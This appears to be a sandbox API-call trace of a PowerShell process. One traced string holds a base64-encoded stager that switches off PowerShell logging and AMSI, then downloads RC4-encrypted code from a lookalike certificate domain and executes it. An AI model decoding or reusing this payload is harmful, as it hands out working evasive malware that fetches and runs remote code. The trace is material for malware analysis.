	[0062.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.589] CoTaskMemFree (pv=0x233e39e8630) 
	[0062.595] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8eb0
	[0062.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8eb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.595] CoTaskMemFree (pv=0x233e39e8eb0) 
	[0062.595] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x690
	[0062.596] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x63c
	[0062.596] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x62c
	[0062.596] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x644
	[0062.597] SetEvent (hEvent=0x644) returned 1
	[0062.597] SetEvent (hEvent=0x690) returned 1
	[0062.597] SetEvent (hEvent=0x63c) returned 1
	[0062.597] SetEvent (hEvent=0x62c) returned 1
	[0062.600] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9620
	[0062.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.600] CoTaskMemFree (pv=0x233e39e9620) 
	[0062.600] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8850
	[0062.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8850, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.600] CoTaskMemFree (pv=0x233e39e8850) 
	[0062.601] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8850
	[0062.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8850, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.601] CoTaskMemFree (pv=0x233e39e8850) 
	[0062.602] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9400
	[0062.602] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9400, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.602] CoTaskMemFree (pv=0x233e39e9400) 
	[0062.604] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x648
	[0062.607] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9620
	[0062.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.607] CoTaskMemFree (pv=0x233e39e9620) 
	[0062.607] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a958 | out: phkResult=0x350027a958*=0x64c) returned 0x0
	[0062.607] RegQueryValueExW (in: hKey=0x64c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x350027a8dc, lpData=0x0, lpcbData=0x350027a8d8*=0x0 | out: lpType=0x350027a8dc*=0x0, lpData=0x0, lpcbData=0x350027a8d8*=0x0) returned 0x2
	[0062.962] CoGetObjectContext (in: riid=0x7ffbf61d3838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350027e2a0 | out: ppv=0x350027e2a0*=0x233e121be18) returned 0x0
	[0062.965] IUnknown:Release (This=0x233e121be18) returned 0x1
	[0062.965] GetTickCount () returned 0x223e9
	[0062.967] SysStringLen (param_1="SQBmACgAJABQAFMAVgBlAFIAcwBpAE8ATgBUAEEAQgBMAEUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AQQBqAE8AcgAgAC0ARwBlACAAMwApAHsAJABHAFAARgA9AFsAUgBFAGYAXQAuAEEAUwBzAEUATQBCAGwAWQAuAEcAZQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAVABWAGEATABVAEUAKAAkAG4AVQBsAGwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAYQBsAD0AWwBDAE8AbABsAGUAQwB0AEkAbwBOAFMALgBHAGUAbgBFAFIASQBjAC4ARABJAEMAVABJAE8ATgBBAHIAWQBbAFMAVAByAEkATgBHACwAUwBZAFMAdABFAE0ALgBPAEIAagBlAGMAVABdAF0AOgA6AG4AZQBXACgAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAEQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABzAGUAewBbAFMAQwByAGkAcAB0AEIAbABPAEMASwBdAC4AIgBHAEUAVABGAGkARQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAGwAVQBlACgAJABuAFUAbABsACwAKABOAEUAVwAtAE8AYgBKAEUAYwB0ACAAQwBvAEwATABlAEMAdABJAG8AbgBTAC4ARwBFAG4ARQByAEkAQwAuAEgAQQBzAEgAUwBFAFQAWwBTAFQAUgBpAG4ARwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAcwBzAEUATQBCAGwAeQAuAEcARQBUAFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAFQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdABWAGEAbABVAEUAKAAkAE4AdQBMAGwALAAkAFQAUgBVAEUAKQB9ADsAfQA7AFsAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFMARQBSAFYASQBjAGUAUABPAGkAbgBUAE0AYQBuAGEAZwBlAFIAXQA6ADoARQBYAFAAZQBjAHQAMQAwADAAQwBPAE4AdABJAG4AVQBlAD0AMAA7ACQAdwBjAD0ATgBFAFcALQBPAGIAagBlAEMAVAAgAFMAWQBzAHQARQBtAC4ATgBlAFQALgBXAEUAYgBDAGwAaQBlAG4AVAA7ACQAdQA9ACcATQBpAGMAcgBvAHMAbwBmAHQALQBDAHIAeQBwAHQAbwBBAFAASQAvADYALgAzACcAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7ACQAdAByAHUAZQB9ADsAJAB3AGMALgBIAEUAQQBEAEUAcgBTAC4AQQBEAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwBYAFkAPQBbAFMAWQBzAHQAZQBNAC4ATgBFAFQALgBXAGUAYgBSAEUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAEEAdQBMAFQAVwBlAEIAUAByAG8AeABZADsAJABXAGMALgBQAHIATwB4AHkALgBDAFIARQBEAGUATgB0AEkAYQBsAFMAIAA9ACAAWwBTAHkAcwB0AEUATQAuAE4ARQB0AC4AQwByAEUARABlAE4AdABJAEEATABDAGEAYwBIAEUAXQA6ADoARABFAGYAQQBVAGwAdABOAEUAVAB3AE8AcgBLAEMAcgBlAEQARQBuAFQAaQBBAGwAUwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAWQBzAHQAZQBNAC4AVABFAFgAdAAuAEUAbgBjAE8AZABJAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAVABFAFMAKAAnAHQAbQBFAHcAcgBLAHAAdgBIADMAeAAuADYAKwBJAGEATwBZAGkALQAyAD8ATgA8AFoAdQBjAF4AVQBEAGQALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwBVAE4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAFgATwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHMAZQByAD0AJwBoAHQAdABwAHMAOgAvAC8AZABpAGcAaQAtAGMAZQByAHQALgBvAHIAZwA6ADQANAAzACcAOwAkAHQAPQAnAC8ATQBGAEUAdwBSAHoAQgBOAE0ARQBzAHcAUwBBAEEASgBCAGcAVQByAEMAZwBNAEMASABnAFUAQQBCAEIAUwBBAFUAUQBZAEIATQBxADIAYQB3AG4AMQBSAGgANgBEAG8AaAAnADsAJABXAEMALgBIAGUAYQBkAEUAUgBzAC4AQQBkAEQAKAAiAEEAYwBjAGUAcAB0ACIALAAiACoALwAqACIAKQA7ACQAdwBjAC4ASABlAGEAZABFAHIAUwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AbABIAFMAaAA2AG0ARABHAFoAOAByADMAMABWADkASABLAEcAUgBqAHEAMwBYAHcATgBTADgAPQAiACkAOwAkAGQAQQB0AGEAPQAkAFcAQwAuAEQATwBXAE4ATABPAEEARABEAGEAdABBACgAJABTAEUAcgArACQAVAApADsAJABJAHYAPQAkAGQAQQB0AEEAWwAwAC4ALgAzAF0AOwAkAEQAYQBUAGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAEQAYQB0AEEALgBMAGUATgBnAHQASABdADsALQBqAG8AaQBOAFsAQwBIAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==") returned 0x1390
	[0063.016] CoCreateGuid (in: pguid=0x350027c460 | out: pguid=0x350027c460*(Data1=0x4b2b97d8, Data2=0x3828, Data3=0x4225, Data4=([0]=0xb8, [1]=0xf5, [2]=0x69, [3]=0x74, [4]=0xf, [5]=0xc, [6]=0x18, [7]=0x58))) returned 0x0
	[0063.017] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027be08 | out: phkResult=0x350027be08*=0x66c) returned 0x0
	[0063.017] RegQueryValueExW (in: hKey=0x66c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x350027bd8c, lpData=0x0, lpcbData=0x350027bd88*=0x0 | out: lpType=0x350027bd8c*=0x0, lpData=0x0, lpcbData=0x350027bd88*=0x0) returned 0x2

Thread:
	id = 40
	os_tid = 0x3b0


Thread:
	id = 41
	os_tid = 0xe44


Thread:
	id = 42
	os_tid = 0xe4c


Thread:
	id = 43
	os_tid = 0xe58


Thread:
	id = 44
	os_tid = 0xe54

	[0350.149] DllCanUnloadNow () returned 0x1

Thread:
	id = 142
	os_tid = 0xd84


Thread:
	id = 151
	os_tid = 0xe68


Thread:
	id = 152
	os_tid = 0xe6c

	[0054.799] CoGetContextToken (in: pToken=0x350067f0f0 | out: pToken=0x350067f0f0) returned 0x0
	[0054.799] IUnknown:QueryInterface (in: This=0x233e121be18, riid=0x7ffbf57cd270*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350067f148 | out: ppvObject=0x350067f148*=0x233e121be30) returned 0x0
	[0054.799] IComThreadingInfo:GetCurrentThreadType (in: This=0x233e121be30, pThreadType=0x350067f1e0 | out: pThreadType=0x350067f1e0*=0) returned 0x0
	[0054.799] IUnknown:Release (This=0x233e121be30) returned 0x1
	[0054.799] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0060.057] RegCloseKey (hKey=0x630) returned 0x0
	[0060.057] RegCloseKey (hKey=0x62c) returned 0x0
	[0060.057] RegCloseKey (hKey=0x628) returned 0x0
	[0061.694] RegCloseKey (hKey=0x674) returned 0x0
	[0061.694] RegCloseKey (hKey=0x6a0) returned 0x0
	[0061.695] RegCloseKey (hKey=0x688) returned 0x0
	[0061.695] RegCloseKey (hKey=0x684) returned 0x0
	[0061.695] RegCloseKey (hKey=0x680) returned 0x0
	[0061.695] RegCloseKey (hKey=0x67c) returned 0x0
	[0061.695] RegCloseKey (hKey=0x678) returned 0x0
	[0061.695] RegCloseKey (hKey=0x65c) returned 0x0
	[0061.695] RegCloseKey (hKey=0x69c) returned 0x0
	[0061.696] RegCloseKey (hKey=0x670) returned 0x0
	[0061.696] RegCloseKey (hKey=0x66c) returned 0x0
	[0061.696] RegCloseKey (hKey=0x668) returned 0x0
	[0061.696] RegCloseKey (hKey=0x664) returned 0x0
	[0061.696] RegCloseKey (hKey=0x660) returned 0x0
	[0061.696] RegCloseKey (hKey=0x634) returned 0x0
	[0061.696] RegCloseKey (hKey=0x698) returned 0x0
	[0061.696] RegCloseKey (hKey=0x694) returned 0x0
	[0061.697] RegCloseKey (hKey=0x658) returned 0x0
	[0061.697] RegCloseKey (hKey=0x654) returned 0x0
	[0061.697] RegCloseKey (hKey=0x650) returned 0x0
	[0061.697] RegCloseKey (hKey=0x64c) returned 0x0
	[0061.697] RegCloseKey (hKey=0x648) returned 0x0
	[0061.697] RegCloseKey (hKey=0x644) returned 0x0
	[0061.697] RegCloseKey (hKey=0x62c) returned 0x0
	[0061.697] RegCloseKey (hKey=0x63c) returned 0x0
	[0061.698] RegCloseKey (hKey=0x690) returned 0x0
	[0062.882] RegCloseKey (hKey=0x64c) returned 0x0
	[0065.298] CloseHandle (hObject=0x778) returned 1
	[0065.298] CertFreeCertificateContext (pCertContext=0x233fc63eb70) returned 1
	[0065.299] CloseHandle (hObject=0x774) returned 1
	[0065.299] CloseHandle (hObject=0x6c0) returned 1
	[0065.299] CertFreeCertificateContext (pCertContext=0x233fc67f830) returned 1
	[0065.299] CloseHandle (hObject=0x6d0) returned 1
	[0065.300] CloseHandle (hObject=0x6cc) returned 1
	[0065.300] CloseHandle (hObject=0x798) returned 1
	[0065.300] CloseHandle (hObject=0x6c8) returned 1
	[0065.300] CertCloseStore (hCertStore=0x233e3926720, dwFlags=0x0) returned 1
	[0065.301] CertFreeCertificateContext (pCertContext=0x233fc63eb70) returned 1
	[0065.301] CloseHandle (hObject=0x79c) returned 1
	[0065.301] CloseHandle (hObject=0x7a0) returned 1
	[0065.301] CertFreeCertificateContext (pCertContext=0x233fc67fbb0) returned 1
	[0065.302] CloseHandle (hObject=0x784) returned 1
	[0065.302] CloseHandle (hObject=0x6b0) returned 1
	[0065.302] CloseHandle (hObject=0x6ac) returned 1
	[0065.302] CloseHandle (hObject=0x6a8) returned 1
	[0065.302] CloseHandle (hObject=0x780) returned 1
	[0065.302] CloseHandle (hObject=0x674) returned 1
	[0065.303] CloseHandle (hObject=0x6a0) returned 1
	[0065.303] CloseHandle (hObject=0x684) returned 1
	[0065.303] CloseHandle (hObject=0x688) returned 1
	[0065.303] CloseHandle (hObject=0x77c) returned 1
	[0065.304] CloseHandle (hObject=0x680) returned 1
	[0065.304] RegCloseKey (hKey=0x66c) returned 0x0
	[0065.507] CloseHandle (hObject=0x648) returned 1
	[0065.507] CloseHandle (hObject=0x644) returned 1
	[0065.507] CloseHandle (hObject=0x62c) returned 1
	[0065.507] CloseHandle (hObject=0x63c) returned 1
	[0065.507] CloseHandle (hObject=0x690) returned 1
	[0067.096] CoGetContextToken (in: pToken=0x350067f0d0 | out: pToken=0x350067f0d0) returned 0x0
	[0067.096] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0067.096] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0067.096] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0067.097] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0067.097] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0067.097] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0067.097] IUnknown:Release (This=0x233e121be18) returned 0x1
	[0067.098] CryptDestroyKey (hKey=0x233fc676290) returned 1
	[0067.098] CryptReleaseContext (hProv=0x233fc6ef160, dwFlags=0x0) returned 1
	[0067.098] CryptReleaseContext (hProv=0x233fc6ef160, dwFlags=0x0) returned 1
	[0069.180] CoGetContextToken (in: pToken=0x350067f0d0 | out: pToken=0x350067f0d0) returned 0x0
	[0069.180] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0069.180] WbemLocator:IUnknown:Release (This=0x233fc704240) returned 0x0
	[0069.180] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0069.180] IUnknown:Release (This=0x233e12e61f0) returned 0x1
	[0069.180] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0069.180] IUnknown:Release (This=0x233e12e5480) returned 0x1
	[0069.180] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0069.180] IUnknown:Release (This=0x233e12e3190) returned 0x1
	[0069.180] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0069.180] IUnknown:Release (This=0x233e12e36f0) returned 0x1
	[0069.181] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0069.181] WbemLocator:IUnknown:Release (This=0x233fc704740) returned 0x0
	[0069.181] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0069.181] IUnknown:Release (This=0x233e12e39a0) returned 0x1
	[0069.181] IUnknown:Release (This=0x233e12e39a0) returned 0x0
	[0069.181] IUnknown:Release (This=0x233e12e3190) returned 0x0
	[0069.181] IUnknown:Release (This=0x233e12e61f0) returned 0x0
	[0069.181] CoGetContextToken (in: pToken=0x350067ef00 | out: pToken=0x350067ef00) returned 0x0
	[0069.181] IUnknown:Release (This=0x233fc70d488) returned 0x1
	[0069.181] IUnknown:Release (This=0x233fc6f4840) returned 0x0
	[0069.182] CoGetContextToken (in: pToken=0x350067ef00 | out: pToken=0x350067ef00) returned 0x0
	[0069.182] IUnknown:Release (This=0x233e399fea8) returned 0x1
	[0069.182] IUnknown:Release (This=0x233fc6f4ae0) returned 0x0
	[0069.183] CryptReleaseContext (hProv=0x233fc6ef360, dwFlags=0x0) returned 1
	[0069.183] CloseHandle (hObject=0x9dc) returned 1
	[0069.183] LocalFree (hMem=0x233fc6449c0) returned 0x0
	[0069.184] LocalFree (hMem=0x233fc644700) returned 0x0
	[0069.184] CryptDestroyKey (hKey=0x233fc676300) returned 1
	[0069.184] CryptReleaseContext (hProv=0x233fc6ef360, dwFlags=0x0) returned 1
	[0070.496] CoGetContextToken (in: pToken=0x350067f0d0 | out: pToken=0x350067f0d0) returned 0x0
	[0070.496] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0070.496] IUnknown:Release (This=0x233e3a03650) returned 0x1
	[0070.496] IUnknown:Release (This=0x233e3a03650) returned 0x0
	[0070.496] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0070.496] IUnknown:Release (This=0x233e3a019d0) returned 0x1
	[0070.496] IUnknown:Release (This=0x233e3a019d0) returned 0x0
	[0070.496] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0070.496] IUnknown:Release (This=0x233e3a01cd0) returned 0x1
	[0070.496] IUnknown:Release (This=0x233e3a01cd0) returned 0x0
	[0070.496] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0070.496] IUnknown:Release (This=0x233fc70db08) returned 0x1
	[0070.496] IUnknown:Release (This=0x233fc70b6d0) returned 0x0
	[0070.497] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0070.497] IUnknown:Release (This=0x233e3a02a50) returned 0x1
	[0070.497] IUnknown:Release (This=0x233e3a02a50) returned 0x0
	[0070.497] IUnknown:Release (This=0x233e12e5480) returned 0x0
	[0070.497] IUnknown:Release (This=0x233e12e36f0) returned 0x0
	[0070.497] CryptDestroyKey (hKey=0x233fc676610) returned 1
	[0070.497] CryptReleaseContext (hProv=0x233fc6ef160, dwFlags=0x0) returned 1
	[0070.498] CryptReleaseContext (hProv=0x233fc6ef160, dwFlags=0x0) returned 1
	[0070.589] CoGetContextToken (in: pToken=0x350067f0d0 | out: pToken=0x350067f0d0) returned 0x0
	[0070.589] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0070.589] IUnknown:Release (This=0x233e399fd08) returned 0x1
	[0070.589] IUnknown:Release (This=0x233e39e5ae0) returned 0x0
	[0070.589] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0070.589] IUnknown:Release (This=0x233e3a02510) returned 0x1
	[0070.589] IUnknown:Release (This=0x233e3a02510) returned 0x0
	[0070.589] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0070.589] IUnknown:Release (This=0x233e3a01f10) returned 0x1
	[0070.589] IUnknown:Release (This=0x233e3a01f10) returned 0x0
	[0070.589] CoGetContextToken (in: pToken=0x350067eff0 | out: pToken=0x350067eff0) returned 0x0
	[0070.589] IUnknown:Release (This=0x233e3a02810) returned 0x1
	[0070.590] IUnknown:Release (This=0x233e3a02810) returned 0x0
	[0070.590] CryptDestroyKey (hKey=0x233fc6757a0) returned 1
	[0070.590] CryptReleaseContext (hProv=0x233fc6f0960, dwFlags=0x0) returned 1
	[0070.590] CryptReleaseContext (hProv=0x233fc6f0960, dwFlags=0x0) returned 1
	[0070.590] CryptDestroyKey (hKey=0x233fc674d90) returned 1
	[0070.590] CryptReleaseContext (hProv=0x233fc6f0960, dwFlags=0x0) returned 1
	[0070.590] CryptReleaseContext (hProv=0x233fc6f0960, dwFlags=0x0) returned 1
	[0070.726] CryptDestroyKey (hKey=0x233fc675180) returned 1
	[0070.726] CryptReleaseContext (hProv=0x233fc6ef360, dwFlags=0x0) returned 1
	[0070.726] CryptReleaseContext (hProv=0x233fc6ef360, dwFlags=0x0) returned 1
	[0089.229] CertFreeCertificateContext (pCertContext=0x233fc6807b0) returned 1
	[0089.229] CertFreeCertificateContext (pCertContext=0x233fc67ffb0) returned 1
	[0089.230] CertFreeCertificateContext (pCertContext=0x233fc680830) returned 1
	[0089.230] CertCloseStore (hCertStore=0x233fc6834f0, dwFlags=0x0) returned 1
	[0089.230] WinHttpCloseHandle (hInternet=0x233fc689300) returned 1
	[0089.230] CloseHandle (hObject=0xa5c) returned 1
	[0089.230] CloseHandle (hObject=0xa58) returned 1
	[0089.231] RegCloseKey (hKey=0xa60) returned 0x0
	[0089.231] CloseHandle (hObject=0xa68) returned 1
	[0089.231] RegCloseKey (hKey=0xa70) returned 0x0
	[0089.231] CloseHandle (hObject=0xa4c) returned 1
	[0089.231] RegCloseKey (hKey=0xa50) returned 0x0
	[0089.231] RegCloseKey (hKey=0x9c8) returned 0x0
	[0089.231] CertFreeCertificateContext (pCertContext=0x233fc67ffb0) returned 1
	[0110.590] CertFreeCertificateContext (pCertContext=0x233fc680730) returned 1
	[0110.590] CertCloseStore (hCertStore=0x233fc681c90, dwFlags=0x0) returned 1
	[0110.591] WinHttpCloseHandle (hInternet=0x233fc68aea0) returned 1
	[0110.591] CloseHandle (hObject=0xa68) returned 1
	[0110.591] CloseHandle (hObject=0xa70) returned 1
	[0110.591] RegCloseKey (hKey=0xa4c) returned 0x0
	[0110.591] CloseHandle (hObject=0xa50) returned 1
	[0110.591] RegCloseKey (hKey=0x9bc) returned 0x0
	[0110.592] CloseHandle (hObject=0x9c8) returned 1
	[0110.592] RegCloseKey (hKey=0x384) returned 0x0
	[0110.592] RegCloseKey (hKey=0xe4) returned 0x0
	[0110.592] FreeContextBuffer (in: pvContextBuffer=0x233e399ba40 | out: pvContextBuffer=0x233e399ba40) returned 0x0
	[0110.592] CertFreeCertificateContext (pCertContext=0x233fc6808b0) returned 1
	[0110.593] CertFreeCertificateContext (pCertContext=0x233fc67fcb0) returned 1
	[0110.593] CertFreeCertificateContext (pCertContext=0x233fc680730) returned 1
	[0110.593] CloseHandle (hObject=0xa5c) returned 1
	[0110.593] CloseHandle (hObject=0xa58) returned 1
	[0124.690] CloseHandle (hObject=0xa7c) returned 1
	[0124.690] CertFreeCertificateContext (pCertContext=0x233fc67f630) returned 1
	[0124.691] WinHttpCloseHandle (hInternet=0x233fc689300) returned 1
	[0124.691] CloseHandle (hObject=0xa68) returned 1
	[0124.691] CloseHandle (hObject=0xa70) returned 1
	[0124.691] RegCloseKey (hKey=0xa4c) returned 0x0
	[0124.691] CloseHandle (hObject=0xa50) returned 1
	[0124.691] RegCloseKey (hKey=0x9bc) returned 0x0
	[0124.691] CloseHandle (hObject=0x9c8) returned 1
	[0124.691] RegCloseKey (hKey=0x384) returned 0x0
	[0124.691] RegCloseKey (hKey=0xa58) returned 0x0
	[0124.692] CertCloseStore (hCertStore=0x233fc6827f0, dwFlags=0x0) returned 1
	[0124.692] FreeContextBuffer (in: pvContextBuffer=0x233e399c460 | out: pvContextBuffer=0x233e399c460) returned 0x0
	[0124.692] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0124.692] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0124.692] CertFreeCertificateContext (pCertContext=0x233fc67f630) returned 1
	[0124.693] CloseHandle (hObject=0xa80) returned 1
	[0140.741] WinHttpCloseHandle (hInternet=0x233fc688a80) returned 1
	[0140.741] CloseHandle (hObject=0xa70) returned 1
	[0140.741] CloseHandle (hObject=0xa4c) returned 1
	[0140.741] RegCloseKey (hKey=0xa50) returned 0x0
	[0140.741] CloseHandle (hObject=0x9bc) returned 1
	[0140.741] RegCloseKey (hKey=0x9c8) returned 0x0
	[0140.741] CloseHandle (hObject=0x384) returned 1
	[0140.742] RegCloseKey (hKey=0xa58) returned 0x0
